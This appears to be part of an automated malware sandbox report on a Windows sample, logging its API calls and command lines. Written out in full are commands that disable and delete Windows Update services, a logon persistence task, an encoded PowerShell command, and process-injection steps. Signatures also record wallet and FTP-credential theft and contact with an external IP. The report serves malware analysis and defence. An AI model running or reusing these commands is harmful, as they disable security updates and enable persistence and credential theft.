"\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE filepath: cmd	1	1
ShellExecuteExW Aug. 31, 2022, 9:57 a.m.	show_type: 0 filepath_r: cmd parameters: /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 filepath: cmd	1	1
ShellExecuteExW Aug. 31, 2022, 9:57 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\"" filepath: cmd	1	1
ShellExecuteExW Aug. 31, 2022, 9:57 a.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /run /tn "WindowsAutHost" filepath: cmd	1	1
ShellExecuteExW Aug. 31, 2022, 9:57 a.m.	show_type: 0 filepath_r: cmd parameters: /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe" filepath: cmd	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 events)

Time & API	Arguments	Status	Return
Process32NextW Aug. 31, 2022, 10:04 a.m.	snapshot_handle: 0x000000f8 process_name: sdclt.exe process_identifier: 2572	1	1
Process32NextW Aug. 31, 2022, 10:04 a.m.	snapshot_handle: 0x000000f8 process_name: SearchProtocolHost.exe process_identifier: 2696	1	1
Process32NextW Aug. 31, 2022, 10:04 a.m.	snapshot_handle: 0x000000f8 process_name: AppLaunch.exe process_identifier: 145512	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 31, 2022, 9:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 31, 2022, 9:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 31, 2022, 9:57 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1

Yara rule detected in process memory (10 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Run a KeyLogger	rule	KeyLogger
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (31 events)

cmdline	reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
cmdline	reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
cmdline	sc stop wuauserv
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsAutHost"
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
cmdline	sc stop UsoSvc
cmdline	reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
cmdline	sc stop WaaSMedicSvc
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
cmdline	reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
cmdline	cmd /c schtasks /run /tn "WindowsAutHost"
cmdline	"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
cmdline	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	sc stop bits
cmdline	"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
cmdline	reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
cmdline	sc stop dosvc
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
cmdline	reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
cmdline	reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
cmdline	cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
cmdline	schtasks /run /tn "WindowsAutHost"
cmdline	reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 44c7f3a8df60cf4349c6bb2343bed0cb7050b2ee

Communicates with host for which no DNS query was performed (1 event)

host

95.142.46.35

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 31, 2022, 10:04 a.m.	process_identifier: 145512 region_size: 663552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00022f7c	1	0	0

Attempts to identify installed AV products by installation directory (2 events)

file	C:\Windows\System32\Tasks\Microsoft\Microsoft Antimalware\
file	C:\Windows\System32\Tasks\Microsoft\Microsoft Antimalware\WaaSMedicSvc.dll

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Aug. 31, 2022, 9:57 a.m.	service_handle: 0x00000000001b6780 service_name: None control_code: 1		0	0
ControlService Aug. 31, 2022, 9:57 a.m.	service_handle: 0x0000000000226770 service_name: None control_code: 1		0	0

Installs itself for autorun at Windows startup (3 events)

cmdline	schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsAutHost" /tr "\"C:\Users\test22\AppData\Roaming\WindowsServices\WindowsAutHost\""

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\wallet.dat
file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Aug. 31, 2022, 10:04 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 145512 process_handle: 0x00022f7c	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2908 called NtSetContextThread to modify thread in remote process 145512
NtSetContextThread Aug. 31, 2022, 10:04 a.m.	registers.eip: 2003108292 registers.esp: 1768444 registers.edi: 0 registers.eax: 4567764 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00022f78 process_identifier: 145512	1	0	0

Powershell script adds registry entries (1 event)

cmd

powercfg /x -standby-timeout-dc 0powercfg /x -hibernate-timeout-ac 0 reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v noautorebootwithloggedonusers /d 1 /t reg_dword /f c:\users\test22\appdata\local\temp\39428011-f743-4bbf\76587423657325823.exe"c:\users\test22\appdata\local\temp\39428011-f743-4bbf\sijpfdhsui3sdfsf.exe" reg delete hklm\system\currentcontrolset\services\dosvc /f choice /c y /n /d y /t 3 sc stop wuauserv "c:\windows\system32\cmd.exe" /c schtasks /run /tn "windowsauthost"takeown /f c:\windows\system32\waasmedicsvc.dll cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0powercfg /x -standby-timeout-ac 0 c:\users\test22\appdata\local\temp\39428011-f743-4bbf\sijpfdhsui3sdfsf.exeschtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistantwakeuprun" /disablec:\windows\microsoft.net\framework\v4.0.30319\applaunch.exeschtasks /change /tn "\microsoft\windows\windowsupdate\sihboot" /disable sc stop usosvc reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v auoptions /d 2 /t reg_dword /f schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistantcalendarrun" /disable sc stop waasmedicsvc schtasks /change /tn "\microsoft\windows\windowsupdate\scheduled start" /disable reg delete hklm\system\currentcontrolset\services\wuauserv /f cmd /c schtasks /run /tn "windowsauthost""c:\users\test22\appdata\local\temp\39428011-f743-4bbf\76587423657325823.exe" "c:\windows\system32\cmd.exe" /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete hklm\system\currentcontrolset\services\usosvc /f & reg delete hklm\system\currentcontrolset\services\waasmedicsvc /f & reg delete hklm\system\currentcontrolset\services\wuauserv /f & reg delete hklm\system\currentcontrolset\services\bits /f & reg delete hklm\system\currentcontrolset\services\dosvc /f & takeown /f %systemroot%\system32\waasmedicsvc.dll & icacls %systemroot%\system32\waasmedicsvc.dll /grant *s-1-1-0:f /t /c /l /q & rename %systemroot%\system32\waasmedicsvc.dll waasmedicsvc_bak.dll & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v auoptions /d 2 /t reg_dword /f & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v autoinstallminorupdates /d 0 /t reg_dword /f & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v noautoupdate /d 1 /t reg_dword /f & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v noautorebootwithloggedonusers /d 1 /t reg_dword /f & schtasks /change /tn "\microsoft\windows\windowsupdate\automatic app update" /disable & schtasks /change /tn "\microsoft\windows\windowsupdate\scheduled start" /disable & schtasks /change /tn "\microsoft\windows\windowsupdate\sih" /disable & schtasks /change /tn "\microsoft\windows\windowsupdate\sihboot" /disable & schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistant" /disable & schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistantcalendarrun" /disable & schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistantwakeuprun" /disableschtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistant" /disable cmd /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete hklm\system\currentcontrolset\services\usosvc /f & reg delete hklm\system\currentcontrolset\services\waasmedicsvc /f & reg delete hklm\system\currentcontrolset\services\wuauserv /f & reg delete hklm\system\currentcontrolset\services\bits /f & reg delete hklm\system\currentcontrolset\services\dosvc /f & takeown /f %systemroot%\system32\waasmedicsvc.dll & icacls %systemroot%\system32\waasmedicsvc.dll /grant *s-1-1-0:f /t /c /l /q & rename %systemroot%\system32\waasmedicsvc.dll waasmedicsvc_bak.dll & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v auoptions /d 2 /t reg_dword /f & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v autoinstallminorupdates /d 0 /t reg_dword /f & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v noautoupdate /d 1 /t reg_dword /f & reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v noautorebootwithloggedonusers /d 1 /t reg_dword /f & schtasks /change /tn "\microsoft\windows\windowsupdate\automatic app update" /disable & schtasks /change /tn "\microsoft\windows\windowsupdate\scheduled start" /disable & schtasks /change /tn "\microsoft\windows\windowsupdate\sih" /disable & schtasks /change /tn "\microsoft\windows\windowsupdate\sihboot" /disable & schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistant" /disable & schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistantcalendarrun" /disable & schtasks /change /tn "\microsoft\windows\updateorchestrator\updateassistantwakeuprun" /disablepowercfg /x -hibernate-timeout-dc 0 powershell -encodedcommand "paajahiazgajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagcayqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmabqb2acmapgagaeaakaagadwaiwbpagiaiwa+acaajablag4adga6afuacwblahiauabyag8azgbpagwazqasacaapaajageazqbnacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeyaaqbsaguacwapacaapaajahyaawb1acmapgagac0argbvahiaywblacaapaajahqaegajad4a"schtasks /create /f /sc onlogon /rl highest /tn "windowsauthost" /tr "\"c:\users\test22\appdata\roaming\windowsservices\windowsauthost\""sc stop bits "c:\windows\system32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0icacls c:\windows\system32\waasmedicsvc.dll /grant *s-1-1-0:f /t /c /l /q "c:\windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del "c:\users\test22\appdata\local\temp\39428011-f743-4bbf\sijpfdhsui3sdfsf.exe"reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v noautoupdate /d 1 /t reg_dword /f sc stop dosvc schtasks /change /tn "\microsoft\windows\windowsupdate\sih" /disable reg delete hklm\system\currentcontrolset\services\waasmedicsvc /f reg delete hklm\system\currentcontrolset\services\usosvc /f cmd /c choice /c y /n /d y /t 3 & del "c:\users\test22\appdata\local\temp\39428011-f743-4bbf\sijpfdhsui3sdfsf.exe""c:\windows\system32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windowsauthost" /tr "\"c:\users\test22\appdata\roaming\windowsservices\windowsauthost\"""c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajahiazgajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajagcayqajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiaa8acmabqb2acmapgagaeaakaagadwaiwbpagiaiwa+acaajablag4adga6afuacwblahiauabyag8azgbpagwazqasacaapaajageazqbnacmapgagacqazqbuahyaogbqahiabwbnahiayqbtaeyaaqbsaguacwapacaapaajahyaawb1acmapgagac0argbvahiaywblacaapaajahqaegajad4a"reg delete hklm\system\currentcontrolset\services\bits /f cmd /c schtasks /create /f /sc onlogon /rl highest /tn "windowsauthost" /tr "\"c:\users\test22\appdata\roaming\windowsservices\windowsauthost\""schtasks /change /tn "\microsoft\windows\windowsupdate\automatic app update" /disable schtasks /run /tn "windowsauthost"reg add hklm\software\policies\microsoft\windows\windowsupdate\au /v autoinstallminorupdates /d 0 /t reg_dword /f

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2908 resumed a thread in remote process 145512
NtResumeThread Aug. 31, 2022, 10:04 a.m.	thread_handle: 0x00022f78 suspend_count: 1 process_identifier: 145512	1	0	0

Uses suspicious command line tools or Windows utilities (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
cmdline	icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Executed a process and injected code into it, probably while unpacking (50 out of 68 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 31, 2022, 10:04 a.m.	thread_handle: 0x000001cc suspend_count: 1 process_identifier: 2796	1	0
CreateProcessInternalW Aug. 31, 2022, 10:04 a.m.	thread_identifier: 2912 thread_handle: 0x00000308 process_identifier: 2908 current_directory: C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF filepath: C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\76587423657325823.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000310	1	1
CreateProcessInternalW Aug. 31, 2022, 10:04 a.m.	thread_identifier: 2976 thread_handle: 0x000002b8 process_identifier: 2972 current_directory: C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF filepath: C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\39428011-F743-4BBF\SIJPFdhsui3sdfSF.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000320	1	1
NtResumeThread Aug. 31, 2022, 10:04 a.m.	thread_handle: 0xfffffffe suspend_count: 0 process_identifier: 2908	1	0
CreateProcessInternalW Aug. 31, 2022, 10:04 a.m.	thread_identifier: 145516 thread_handle: 0x00022f78 process_identifier: 145512 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00022f7c	1	1
NtGetContextThread Aug. 31, 2022, 10:04 a.m.	thread_handle: 0x00022f78	1	0
NtAllocateVirtualMemory Aug. 31, 2022, 10:04 a.m.	process_identifier: 145512 region_size: 663552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00022f7c	1	0
WriteProcessMemory Aug. 31, 2022, 10:04 a.m.	buffer: base_address: 0x00400000 process_identifier: 145512 process_handle: 0x00022f7c	1	1
WriteProcessMemory Aug. 31, 2022, 10:04 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 145512 process_handle: 0x00022f7c	1	1
NtSetContextThread Aug. 31, 2022, 10:04 a.m.	registers.eip: 2003108292 registers.esp: 1768444 registers.edi: 0 registers.eax: 4567764 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00022f78 process_identifier: 145512	1	0
NtResumeThread Aug. 31, 2022, 10:04 a.m.	thread_handle: 0x00022f78 suspend_count: 1 process_identifier: 145512	1	0
NtResumeThread Aug. 31, 2022, 10:04 a.m.	thread_handle: 0xfffffffe suspend_count: 0 process_identifier: 2908	1	0
NtResumeThread Aug. 31, 2022, 9:56 a.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2972	1	0
NtResumeThread Aug. 31, 2022, 9:56 a.m.	thread_handle: 0x000000000000013c suspend_count: 1 process_identifier: 2972	1	0
NtResumeThread Aug. 31, 2022, 9:56 a.m.	thread_handle: 0x0000000000000180 suspend_count: 1 process_identifier: 2972	1	0
